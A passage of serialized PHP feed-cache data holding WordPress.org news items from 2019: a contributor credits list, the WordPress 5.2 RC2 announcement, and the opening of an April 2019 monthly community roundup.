href="https://profiles.wordpress.org/denis-de-bernardy">Denis de Bernardy</a>, <a href="https://profiles.wordpress.org/dmsnell">Dennis Snell</a>, <a href="https://profiles.wordpress.org/valendesigns">Derek Herman</a>, <a href="https://profiles.wordpress.org/pcfreak30">Derrick Hammer</a>, <a href="https://profiles.wordpress.org/designsimply">designsimply</a>, <a href="https://profiles.wordpress.org/dhanukanuwan">Dhanukanuwan</a>, <a href="https://profiles.wordpress.org/dharm1025">Dharmesh Patel</a>, <a href="https://profiles.wordpress.org/dianeco">Diane</a>, <a href="https://profiles.wordpress.org/diegoreymendez">diegoreymendez</a>, <a href="https://profiles.wordpress.org/dilipbheda">Dilip Bheda</a>, <a href="https://profiles.wordpress.org/odminstudios">Dima</a>, <a href="https://profiles.wordpress.org/dd32">Dion Hulse</a>, <a href="https://profiles.wordpress.org/dency">Dixita Dusara</a>, <a href="https://profiles.wordpress.org/iamdmitrymayorov">Dmitry Mayorov</a>, <a href="https://profiles.wordpress.org/ocean90">Dominik Schilling</a>, <a href="https://profiles.wordpress.org/drewapicture">Drew Jaynes</a>, <a href="https://profiles.wordpress.org/dsifford">dsifford</a>, <a href="https://profiles.wordpress.org/seedsca">ecotechie</a>, <a href="https://profiles.wordpress.org/etoledom">Eduardo Toledo</a>, <a href="https://profiles.wordpress.org/iseulde">Ella Van Durpe</a>, <a href="https://profiles.wordpress.org/edocev">Emil Dotsev</a>, <a href="https://profiles.wordpress.org/fabiankaegy">fabiankaegy</a>, <a href="https://profiles.wordpress.org/faisal03">Faisal Alvi</a>, <a href="https://profiles.wordpress.org/parsmizban">Farhad Sakhaei</a>, <a href="https://profiles.wordpress.org/flixos90">Felix Arntz</a>, <a href="https://profiles.wordpress.org/peaceablewhale">Franklin Tse</a>, <a href="https://profiles.wordpress.org/fuegas">Fuegas</a>, <a href="https://profiles.wordpress.org/garrett-eclipse">Garrett Hyder</a>, <a href="https://profiles.wordpress.org/garyj">Gary Jones</a>, <a href="https://profiles.wordpress.org/soulseekah">Gennady Kovshenin</a>, <a href="https://profiles.wordpress.org/sachyya-sachet">ghoul</a>, <a href="https://profiles.wordpress.org/girishpanchal">Girish Panchal</a>, <a href="https://profiles.wordpress.org/gziolo">Grzegorz Ziółkowski</a>, <a href="https://profiles.wordpress.org/wido">Guido Scialfa</a>, <a href="https://profiles.wordpress.org/gutendev">GutenDev <img src="https://s.w.org/images/core/emoji/12.0.0-1/72x72/270d.png" alt="✍" class="wp-smiley" style="height: 1em; max-height: 1em;" /><img src="https://s.w.org/images/core/emoji/12.0.0-1/72x72/3299.png" alt="㊙" class="wp-smiley" style="height: 1em; max-height: 1em;" /></a>, <a href="https://profiles.wordpress.org/gwwar">gwwar</a>, <a href="https://profiles.wordpress.org/hannahmalcolm">Hannah Malcolm</a>, <a href="https://profiles.wordpress.org/hardik-amipara">Hardik Amipara</a>, <a href="https://profiles.wordpress.org/thakkarhardik">Hardik Thakkar</a>, <a href="https://profiles.wordpress.org/luehrsen">Hendrik Luehrsen</a>, <a href="https://profiles.wordpress.org/henrywright-1">Henry</a>, <a href="https://profiles.wordpress.org/henrywright">Henry Wright</a>, <a href="https://profiles.wordpress.org/ryanshoover">Hoover</a>, <a href="https://profiles.wordpress.org/ianbelanger">Ian Belanger</a>, <a href="https://profiles.wordpress.org/iandunn">Ian Dunn</a>, <a href="https://profiles.wordpress.org/ice9js">ice9js</a>, <a href="https://profiles.wordpress.org/zinigor">Igor Zinovyev</a>, <a href="https://profiles.wordpress.org/imath">imath</a>, <a href="https://profiles.wordpress.org/ixium">Ixium</a>, <a href="https://profiles.wordpress.org/jdgrimes">J.D. Grimes</a>, <a href="https://profiles.wordpress.org/jakeparis">jakeparis</a>, <a href="https://profiles.wordpress.org/cc0a">James</a>, <a href="https://profiles.wordpress.org/janak007">janak Kaneriya</a>, <a href="https://profiles.wordpress.org/jarred-kennedy">Jarred Kennedy</a>, <a href="https://profiles.wordpress.org/vengisss">Javier Villanueva</a>, <a href="https://profiles.wordpress.org/jayupadhyay01">Jay Upadhyay</a>, <a href="https://profiles.wordpress.org/jaydeep-rami">Jaydip Rami</a>, <a href="https://profiles.wordpress.org/parkcityj">Jaye Simons</a>, <a href="https://profiles.wordpress.org/jaymanpandya">Jayman Pandya</a>, <a href="https://profiles.wordpress.org/jdeeburke">jdeeburke</a>, <a href="https://profiles.wordpress.org/audrasjb">Jean-Baptiste Audras</a>, <a href="https://profiles.wordpress.org/jeffpaul">Jeff Paul</a>, <a href="https://profiles.wordpress.org/cheffheid">Jeffrey de Wit</a>, <a href="https://profiles.wordpress.org/miss_jwo">Jenny Wong</a>, <a href="https://profiles.wordpress.org/jeremyfelt">Jeremy Felt</a>, <a href="https://profiles.wordpress.org/endocreative">Jeremy Green</a>, <a href="https://profiles.wordpress.org/jeherve">Jeremy Herve</a>, <a href="https://profiles.wordpress.org/jitendrabanjara1991">jitendrabanjara1991</a>, <a href="https://profiles.wordpress.org/johnjamesjacoby">JJJ</a>, <a href="https://profiles.wordpress.org/joedolson">Joe Dolson</a>, <a href="https://profiles.wordpress.org/joemcgill">Joe McGill</a>, <a href="https://profiles.wordpress.org/joen">Joen Asmussen</a>, <a href="https://profiles.wordpress.org/j-falk">Johan Falk</a>, <a href="https://profiles.wordpress.org/johannadevos">Johanna de Vos</a>, <a href="https://profiles.wordpress.org/johnbillion">John Blackbourn</a>, <a href="https://profiles.wordpress.org/desrosj">Jonathan Desrosiers</a>, <a href="https://profiles.wordpress.org/jonathandejong">Jonathandejong</a>, <a href="https://profiles.wordpress.org/joneiseman">joneiseman</a>, <a href="https://profiles.wordpress.org/spacedmonkey">Jonny Harris</a>, <a href="https://profiles.wordpress.org/jonnybojangles">jonnybojangles</a>, <a href="https://profiles.wordpress.org/joostdevalk">Joost de Valk</a>, <a href="https://profiles.wordpress.org/jordesign">jordesign</a>, <a href="https://profiles.wordpress.org/koke">Jorge Bernal</a>, <a href="https://profiles.wordpress.org/jorgefilipecosta">Jorge Costa</a>, <a href="https://profiles.wordpress.org/keraweb">Jory Hogeveen</a>, <a href="https://profiles.wordpress.org/jcastaneda">Jose Castaneda</a>, <a href="https://profiles.wordpress.org/josephwa">josephwa</a>, <a href="https://profiles.wordpress.org/builtbynorthby">Josh Feck</a>, <a href="https://profiles.wordpress.org/joshuawold">JoshuaWold</a>, <a href="https://profiles.wordpress.org/joyously">Joy</a>, <a href="https://profiles.wordpress.org/jplojohn">jplo</a>, <a href="https://profiles.wordpress.org/jrtashjian">JR Tashjian</a>, <a href="https://profiles.wordpress.org/jrf">jrf</a>, <a href="https://profiles.wordpress.org/juiiee8487">Juhi Patel</a>, <a href="https://profiles.wordpress.org/juliarrr">juliarrr</a>, <a href="https://profiles.wordpress.org/kadamwhite">K. Adam White</a>, <a href="https://profiles.wordpress.org/kamataryo">KamataRyo</a>, <a href="https://profiles.wordpress.org/karinedo">Karine Do</a>, <a href="https://profiles.wordpress.org/katyatina">Katyatina</a>, <a href="https://profiles.wordpress.org/kelin1003">Kelin Chauhan</a>, <a href="https://profiles.wordpress.org/ryelle">Kelly Dwan</a>, <a href="https://profiles.wordpress.org/itzmekhokan">Khokan Sardar</a>, <a href="https://profiles.wordpress.org/killua99">killua99</a>, <a href="https://profiles.wordpress.org/ixkaito">Kite</a>, <a href="https://profiles.wordpress.org/kjellr">Kjell Reigstad</a>, <a href="https://profiles.wordpress.org/knutsp">Knut Sparhell</a>, <a href="https://profiles.wordpress.org/olein">Koji Kuno</a>, <a href="https://profiles.wordpress.org/obenland">Konstantin Obenland</a>, <a href="https://profiles.wordpress.org/xkon">Konstantinos Xenos</a>, <a href="https://profiles.wordpress.org/codemascot">Kʜᴀɴ (ಠ_ಠ)</a>, <a href="https://profiles.wordpress.org/laurelfulford">laurelfulford</a>, <a href="https://profiles.wordpress.org/lkraav">lkraav</a>, <a href="https://profiles.wordpress.org/lovingboth">lovingboth</a>, <a href="https://profiles.wordpress.org/lukecarbis">Luke Carbis</a>, <a href="https://profiles.wordpress.org/lgedeon">Luke Gedeon</a>, <a href="https://profiles.wordpress.org/lukepettway">Luke Pettway</a>, <a href="https://profiles.wordpress.org/maedahbatool">Maedah Batool</a>, <a href="https://profiles.wordpress.org/travel_girl">Maja Benke</a>, <a href="https://profiles.wordpress.org/malae">Malae</a>, <a href="https://profiles.wordpress.org/manzoorwanijk">Manzoor Wani</a>, <a href="https://profiles.wordpress.org/robobot3000">Marcin</a>, <a href="https://profiles.wordpress.org/iworks">Marcin Pietrzak</a>, <a href="https://profiles.wordpress.org/marcofernandes">Marco Fernandes</a>, <a href="https://profiles.wordpress.org/marco-peralta">Marco Peralta</a>, <a href="https://profiles.wordpress.org/mkaz">Marcus Kazmierczak</a>, <a href="https://profiles.wordpress.org/marekhrabe">marekhrabe</a>, <a href="https://profiles.wordpress.org/clorith">Marius Jensen</a>, <a href="https://profiles.wordpress.org/mbelchev">Mariyan Belchev</a>, <a href="https://profiles.wordpress.org/mapk">Mark Uraine</a>, <a href="https://profiles.wordpress.org/markcallen">markcallen</a>, <a href="https://profiles.wordpress.org/mechter">Markus Echterhoff</a>, <a href="https://profiles.wordpress.org/m-e-h">Marty Helmick</a>, <a href="https://profiles.wordpress.org/marybaum">marybaum</a>, <a href="https://profiles.wordpress.org/mattnyeus">mattnyeus</a>, <a href="https://profiles.wordpress.org/mdwolinski">mdwolinski</a>, <a href="https://profiles.wordpress.org/immeet94">Meet Makadia</a>, <a href="https://profiles.wordpress.org/melchoyce">Mel Choyce</a>, <a href="https://profiles.wordpress.org/mheikkila">mheikkila</a>, <a href="https://profiles.wordpress.org/wpscholar">Micah Wood</a>, <a href="https://profiles.wordpress.org/michelleweber">michelleweber</a>, <a href="https://profiles.wordpress.org/mcsf">Miguel Fonseca</a>, <a href="https://profiles.wordpress.org/mmtr86">Miguel Torres</a>, <a href="https://profiles.wordpress.org/simison">Mikael Korpela</a>, <a href="https://profiles.wordpress.org/mauteri">Mike Auteri</a>, <a href="https://profiles.wordpress.org/mikeschinkel">Mike Schinkel [WPLib Box project lead]</a>, <a href="https://profiles.wordpress.org/mikeschroder">Mike Schroder</a>, <a href="https://profiles.wordpress.org/mikeselander">Mike Selander</a>, <a href="https://profiles.wordpress.org/mikengarrett">MikeNGarrett</a>, <a href="https://profiles.wordpress.org/dimadin">Milan Dinić</a>, <a href="https://profiles.wordpress.org/0mirka00">mirka</a>, <a href="https://profiles.wordpress.org/lord_viper">Mobin Ghasempoor</a>, <a href="https://profiles.wordpress.org/mohadeseghasemi">Mohadese Ghasemi</a>, <a href="https://profiles.wordpress.org/saimonh">Mohammed Saimon</a>, <a href="https://profiles.wordpress.org/mor10">Morten Rand-Hendriksen</a>, <a href="https://profiles.wordpress.org/man4toman">Morteza Geransayeh</a>, <a href="https://profiles.wordpress.org/mmuhsin">Muhammad Muhsin</a>, <a href="https://profiles.wordpress.org/mukesh27">Mukesh Panchal</a>, <a href="https://profiles.wordpress.org/m_uysl">Mustafa Uysal</a>, <a href="https://profiles.wordpress.org/mzorz">mzorz</a>, <a href="https://profiles.wordpress.org/nfmohit">Nahid F. Mohit</a>, <a href="https://profiles.wordpress.org/naoki0h">Naoki Ohashi</a>, <a href="https://profiles.wordpress.org/nateallen">Nate Allen</a>, <a href="https://profiles.wordpress.org/greatislander">Ned Zimmerman</a>, <a href="https://profiles.wordpress.org/neobabis">Neokazis Charalampos</a>, <a href="https://profiles.wordpress.org/modernnerd">Nick Cernis</a>, <a href="https://profiles.wordpress.org/ndiego">Nick Diego</a>, <a href="https://profiles.wordpress.org/celloexpressions">Nick Halsey</a>, <a href="https://profiles.wordpress.org/jainnidhi">Nidhi Jain</a>, <a href="https://profiles.wordpress.org/nielsdeblaauw">Niels de Blaauw</a>, <a href="https://profiles.wordpress.org/nielslange">Niels Lange</a>, <a href="https://profiles.wordpress.org/nnikolov">Nikolay Nikolov</a>, <a href="https://profiles.wordpress.org/rabmalin">Nilambar Sharma</a>, <a href="https://profiles.wordpress.org/ninio">ninio</a>, <a href="https://profiles.wordpress.org/notnownikki">notnownikki</a>, <a href="https://profiles.wordpress.org/bulletdigital">Oliver Sadler</a>, <a href="https://profiles.wordpress.org/onlanka">onlanka</a>, <a href="https://profiles.wordpress.org/pandelisz">pandelisz</a>, <a href="https://profiles.wordpress.org/swissspidy">Pascal Birchler</a>, <a href="https://profiles.wordpress.org/pbearne">Paul Bearne</a>, <a href="https://profiles.wordpress.org/pbiron">Paul Biron</a>, <a href="https://profiles.wordpress.org/pedromendonca">Pedro Mendon&#231;a</a>, <a href="https://profiles.wordpress.org/peterbooker">Peter Booker</a>, <a href="https://profiles.wordpress.org/peterwilsoncc">Peter Wilson</a>, <a href="https://profiles.wordpress.org/pfiled">pfiled</a>, <a href="https://profiles.wordpress.org/pilou69">pilou69</a>, <a href="https://profiles.wordpress.org/pranalipatel">Pranali Patel</a>, <a href="https://profiles.wordpress.org/pratikthink">Pratik</a>, <a href="https://profiles.wordpress.org/pratikkry">Pratik K. Yadav</a>, <a href="https://profiles.wordpress.org/presskopp">Presskopp</a>, <a href="https://profiles.wordpress.org/psealock">psealock</a>, <a href="https://profiles.wordpress.org/punit5658">Punit Patel</a>, <a href="https://profiles.wordpress.org/bamadesigner">Rachel Cherry</a>, <a href="https://profiles.wordpress.org/rahmon">Rahmon</a>, <a href="https://profiles.wordpress.org/superpoincare">Ramanan</a>, <a href="https://profiles.wordpress.org/ramiy">Rami Yushuvaev</a>, <a href="https://profiles.wordpress.org/ramizmanked">Ramiz Manked</a>, <a href="https://profiles.wordpress.org/ramonopoly">ramonopoly</a>, <a href="https://profiles.wordpress.org/youknowriad">Riad Benguella</a>, <a href="https://profiles.wordpress.org/rinatkhaziev">Rinat Khaziev</a>, <a href="https://profiles.wordpress.org/noisysocks">Robert Anderson</a>, <a href="https://profiles.wordpress.org/rsusanto">Rudy Susanto</a>, <a href="https://profiles.wordpress.org/ryan">Ryan Boren</a>, <a href="https://profiles.wordpress.org/welcher">Ryan Welcher</a>, <a href="https://profiles.wordpress.org/sebastienserre">S&#233;bastien SERRE</a>, <a href="https://profiles.wordpress.org/saeedfard">Saeed Fard</a>, <a href="https://profiles.wordpress.org/salcode">Sal Ferrarello</a>, <a href="https://profiles.wordpress.org/salar6990">Salar Gholizadeh</a>, <a href="https://profiles.wordpress.org/samanehmirrajabi">Samaneh Mirrajabi</a>, <a href="https://profiles.wordpress.org/samikeijonen">Sami Keijonen</a>, <a href="https://profiles.wordpress.org/elhardoum">Samuel Elh</a>, <a href="https://profiles.wordpress.org/sgarza">Santiago Garza</a>, <a href="https://profiles.wordpress.org/saracope">Sara Cope</a>, <a href="https://profiles.wordpress.org/saracup">saracup</a>, <a href="https://profiles.wordpress.org/tinkerbelly">sarah semark</a>, <a href="https://profiles.wordpress.org/paragoninitiativeenterprises">Scott Arciszewski</a>, <a href="https://profiles.wordpress.org/coffee2code">Scott Reilly</a>, <a href="https://profiles.wordpress.org/sebastianpisula">Sebastian Pisula</a>, <a href="https://profiles.wordpress.org/ebrahimzadeh">Sekineh Ebrahimzadeh</a>, <a href="https://profiles.wordpress.org/sergeybiryukov">Sergey Biryukov</a>, <a href="https://profiles.wordpress.org/sergioestevao">SergioEstevao</a>, <a href="https://profiles.wordpress.org/sgastard">sgastard</a>, <a href="https://profiles.wordpress.org/sharifkiberu">sharifkiberu</a>, <a href="https://profiles.wordpress.org/shazdeh">shazdeh</a>, <a href="https://profiles.wordpress.org/shital-patel">Shital Marakana</a>, <a href="https://profiles.wordpress.org/sky_76">sky_76</a>, <a href="https://profiles.wordpress.org/soean">Soren Wrede</a>, <a href="https://profiles.wordpress.org/netweb">Stephen Edgar</a>, <a href="https://profiles.wordpress.org/stevenkword">Steven Word</a>, <a href="https://profiles.wordpress.org/subrataemfluence">Subrata Sarkar</a>, <a href="https://profiles.wordpress.org/sudar">Sudar Muthu</a>, <a href="https://profiles.wordpress.org/sudhiryadav">Sudhir Yadav</a>, <a href="https://profiles.wordpress.org/szepeviktor">szepe.viktor</a>, <a href="https://profiles.wordpress.org/miyauchi">Takayuki Miyauchi</a>, <a href="https://profiles.wordpress.org/karmatosed">Tammie Lister</a>, <a href="https://profiles.wordpress.org/themonic">Themonic</a>, <a href="https://profiles.wordpress.org/thomstark">thomstark</a>, <a href="https://profiles.wordpress.org/tfrommen">Thorsten Frommen</a>, <a href="https://profiles.wordpress.org/thrijith">Thrijith Thankachan</a>, <a href="https://profiles.wordpress.org/hedgefield">Tim Hedgefield</a>, <a href="https://profiles.wordpress.org/timwright12">Tim Wright</a>, <a href="https://profiles.wordpress.org/timothyblynjacobs">Timothy Jacobs</a>, <a href="https://profiles.wordpress.org/timph">timph</a>, <a href="https://profiles.wordpress.org/tmatsuur">tmatsuur</a>, <a href="https://profiles.wordpress.org/tmdesigned">tmdesigned</a>, <a href="https://profiles.wordpress.org/ohiosierra">tmdesigned</a>, <a href="https://profiles.wordpress.org/tz-media">Tobias Zimpel</a>, <a href="https://profiles.wordpress.org/tobiasbg">TobiasBg</a>, <a href="https://profiles.wordpress.org/tomharrigan">TomHarrigan</a>, <a href="https://profiles.wordpress.org/tonybogdanov">tonybogdanov</a>, <a href="https://profiles.wordpress.org/tobifjellner">Tor-Bjorn Fjellner</a>, <a href="https://profiles.wordpress.org/toro_unit">Toro_Unit (Hiroshi Urabe)</a>, <a href="https://profiles.wordpress.org/torres126">torres126</a>, <a href="https://profiles.wordpress.org/zodiac1978">Torsten Landsiedel</a>, <a href="https://profiles.wordpress.org/itowhid06">Towhidul Islam</a>, <a href="https://profiles.wordpress.org/liljimmi">Tracy Levesque</a>, <a href="https://profiles.wordpress.org/umang7">Umang Bhanvadia</a>, <a href="https://profiles.wordpress.org/vaishalipanchal">Vaishali Panchal</a>, <a href="https://profiles.wordpress.org/webfactory">WebFactory</a>, <a href="https://profiles.wordpress.org/westonruter">Weston Ruter</a>, <a href="https://profiles.wordpress.org/wfmattr">WFMattR</a>, <a href="https://profiles.wordpress.org/bahia0019">William ''Bahia'' Bay</a>, <a href="https://profiles.wordpress.org/earnjam">William Earnhardt</a>, <a href="https://profiles.wordpress.org/williampatton">williampatton</a>, <a href="https://profiles.wordpress.org/willscrlt">Willscrlt</a>, <a href="https://profiles.wordpress.org/wolly">Wolly aka Paolo Valenti</a>, <a href="https://profiles.wordpress.org/wrwrwr0">wrwrwr0</a>, <a href="https://profiles.wordpress.org/yoavf">Yoav Farhi</a>, <a href="https://profiles.wordpress.org/fierevere">Yui</a>, <a href="https://profiles.wordpress.org/zebulan">Zebulan Stanphill</a>, and <a href="https://profiles.wordpress.org/chesio">Česlav Przywara</a>.\n\n\n\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n\n\n\n<p>Also, many thanks to all of the community volunteers who contribute in the <a href="https://wordpress.org/support/">support forums</a>. They answer questions from people across the world, whether they are using WordPress for the first time or since the first release. These releases are more successful for their efforts!</p>\n\n\n\n<p>If you want learn more about volunteering with WordPress, check out&nbsp;<a href="https://make.wordpress.org/">Make WordPress</a>&nbsp;or the&nbsp;<a href="https://make.wordpress.org/core/">core development blog</a>.</p>\n\n\n\n<p>Thanks for choosing WordPress!</p>\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:30:"com-wordpress:feed-additions:1";a:1:{s:7:"post-id";a:1:{i:0;a:5:{s:4:"data";s:4:"6925";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:3;a:6:{s:4:"data";s:51:"\n		\n		\n				\n		\n				\n		\n\n		\n				\n								\n										";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:4:{s:0:"";a:6:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:17:"WordPress 5.2 RC2";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:53:"https://wordpress.org/news/2019/05/wordpress-5-2-rc2/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Thu, 02 May 2019 16:17:59 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"category";a:2:{i:0;a:5:{s:4:"data";s:11:"Development";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:1;a:5:{s:4:"data";s:8:"Releases";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:34:"https://wordpress.org/news/?p=6914";s:7:"attribs";a:1:{s:0:"";a:1:{s:11:"isPermaLink";s:5:"false";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:326:"The second release candidate for WordPress 5.2 is now available! WordPress 5.2 will be released on Tuesday, May 7, but we need your help to get there—if you haven’t tried 5.2 yet, now is the time! There are two ways to test the WordPress 5.2 release candidate: try the WordPress Beta Tester plugin (you’ll want [&#8230;]";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:7:"Josepha";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:40:"http://purl.org/rss/1.0/modules/content/";a:1:{s:7:"encoded";a:1:{i:0;a:5:{s:4:"data";s:2472:"\n<p>The second release candidate for WordPress 5.2 is now available!</p>\n\n\n\n<p>WordPress 5.2 will be released on <strong><a href="https://make.wordpress.org/core/5-2/">Tuesday, May 7</a></strong>, but we need <em>your</em> help to get there—if you haven’t tried 5.2 yet, now is the time!</p>\n\n\n\n<p>There are two ways to test the WordPress 5.2 release candidate: try the <a href="https://wordpress.org/plugins/wordpress-beta-tester/">WordPress Beta Tester</a> plugin (you’ll want to select the “bleeding edge nightlies” option), or you can <a href="https://wordpress.org/wordpress-5.2-RC2.zip">download the release candidate here</a> (zip).</p>\n\n\n\n<p>For details about what to expect in WordPress 5.2, please see the <a href="https://wordpress.org/news/2019/04/wordpress-5-2-release-candidate/">first release candidate post</a>.</p>\n\n\n\n<p>This release includes the final About page design. It also contains fixes for:</p>\n\n\n\n<ul><li>Proper translation of the recovery mode notification emails (#47093).</li><li>Improvements to the way Site Health works with multisite installs (#47084).</li></ul>\n\n\n\n<h2>Plugin and Theme Developers</h2>\n\n\n\n<p>Please test your plugins and themes against WordPress 5.2 and update the <em>Tested up to</em> version in the readme to 5.2. If you find compatibility problems, please be sure to post to the <a href="https://wordpress.org/support/forum/alphabeta/">support forums</a> so we can figure those out before the final release.</p>\n\n\n\n<p>The&nbsp;<a href="https://make.wordpress.org/core/2019/04/16/wordpress-5-2-field-guide/">WordPress 5.2 Field Guide</a>&nbsp;has also been published, which details the major changes.</p>\n\n\n\n<h2>How to Help</h2>\n\n\n\n<p>Do you speak a language other than English? <a href="https://translate.wordpress.org/projects/wp/dev">Help us translate WordPress into more than 100 languages!</a></p>\n\n\n\n<p><em><strong>If you think you’ve found a bug</strong>, you can post to the <a href="https://wordpress.org/support/forum/alphabeta">Alpha/Beta area</a> in the support forums. We’d love to hear from you! If you’re comfortable writing a reproducible bug report, <a href="https://make.wordpress.org/core/reports/">file one on WordPress Trac</a>, where you can also find <a href="https://core.trac.wordpress.org/tickets/major">a list of known bugs</a>.</em></p>\n\n\n\n<hr class="wp-block-separator" />\n\n\n\n<p><em>It&#8217;s the start of May<br>and the release is coming.<br>We all give a cheer!</em></p>\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:30:"com-wordpress:feed-additions:1";a:1:{s:7:"post-id";a:1:{i:0;a:5:{s:4:"data";s:4:"6914";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:4;a:6:{s:4:"data";s:48:"\n		\n		\n				\n		\n				\n\n		\n				\n								\n										";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:4:{s:0:"";a:6:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:34:"The Month in WordPress: April 2019";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:69:"https://wordpress.org/news/2019/05/the-month-in-wordpress-april-2019/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Thu, 02 May 2019 09:00:26 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"category";a:1:{i:0;a:5:{s:4:"data";s:18:"Month in WordPress";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:34:"https://wordpress.org/news/?p=6918";s:7:"attribs";a:1:{s:0:"";a:1:{s:11:"isPermaLink";s:5:"false";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:324:"This past month has been filled with anticipation as the community builds up towards a big new release, plans some important events, and builds new tools to grow the future of the project. WordPress 5.2 Almost Due for Release WordPress 5.2 is due for release on May 7 with many new features included for developers [&#8230;]";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:15:"Hugh Lashbrooke";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:40:"http://purl.org/rss/1.0/modules/content/";a:1:{s:7:"encoded";a:1:{i:0;a:5:{s:4:"data";s:8386:"\n<p>This past month has been filled with anticipation as the community builds up towards a big new release, plans some important events, and builds new tools to grow the future of the project.</p>\n\n\n\n<hr class="wp-block-separator" />\n\n\n\n<h2>WordPress 5.2 Almost Due for Release</h2>\n\n\n\n<p>WordPress 5.2 is due for release on May 7 with many new features included for developers and end-users alike. <a href="https://make.wordpress.org/core/2019/04/16/wordpress-5-2-field-guide/">The Field Guide for the release</a> provides a lot of information about what is in it and what you can expect, including a few key elements:</p>\n\n\n\n<h3>Site Health Check</h3>\n\n\n\n<p>One of the most highly anticipated features for v5.2 is <a href="https://make.wordpress.org/core/2019/04/25/site-health-check-in-5-2/">the Site Health Check</a>. This feature adds two new pages in the admin interface to help end users maintain a healthy site through common configuration issues and other elements that go along with having a robust online presence. It also provides a standardized location for developers to add debugging information.</p>\n\n\n\n<h3>Fatal Error Recovery Mode</h3>\n\n\n\n<p><a href="https://make.wordpress.org/core/2019/04/16/fatal-error-recovery-mode-in-5-2/">The Fatal Error Recovery Mode feature</a> was originally planned for the 5.1 release but was delayed to patch up some last-minute issues that arose. This feature will help site-owners recover more quickly from fatal errors that break the display or functionality of their site that would ordinarily require code or database edits to fix.</p>\n\n\n\n<h3>Privacy and Accessibility Updates</h3>\n\n\n\n<p>Along with the headlining features mentioned above, there are some important enhancements to the privacy and accessibility features included in Core. These include <a href="https://make.wordpress.org/core/2019/04/24/developer-focused-privacy-updates-in-5-2/">some important developer-focused changes</a> to how privacy policy pages are displayed and user data is exported, as well as <a href="https://make.wordpress.org/core/2019/04/02/admin-tabs-semantic-improvements-in-5-2/">moving to more semantic markup for admin tabs</a> and <a href="https://make.wordpress.org/core/2019/04/24/notable-accessibility-changes-in-5-2/">other improvements</a> such as switching post format icons to drop-down menus on post list tables, improved admin toolbar markup, and contextual improvements to archive widget drop-down menu.</p>\n\n\n\n<h3>New Dashicons</h3>\n\n\n\n<p>The <a href="https://developer.wordpress.org/resource/dashicons/">Dashicons</a> library was last updated was over 3 years ago. Now, in the upcoming release, <a href="https://make.wordpress.org/core/2019/04/11/dashicons-in-wordpress-5-2/">a set of 13 new icons will be added to the library</a> along with improvements to the build process and file format of the icons.</p>\n\n\n\n<h3>Block Editor Upgrades</h3>\n\n\n\n<p>The Block Editor has seen <a href="https://make.wordpress.org/core/2019/04/17/whats-new-in-gutenberg-17th-april/">numerous improvements</a> lately that will all be included in the v5.2 release. Along with the interface upgrades, the underlying Javascript module <a href="https://make.wordpress.org/core/2019/04/09/the-block-editor-javascript-module-in-5-2/">has been reorganized</a>, improvements have been made to <a href="https://make.wordpress.org/core/2019/04/17/block-editor-detection-improvements-in-5-2/">how the block editor is detected</a> on the post edit screen, and <a href="https://make.wordpress.org/core/2019/03/25/building-javascript/">the Javascript 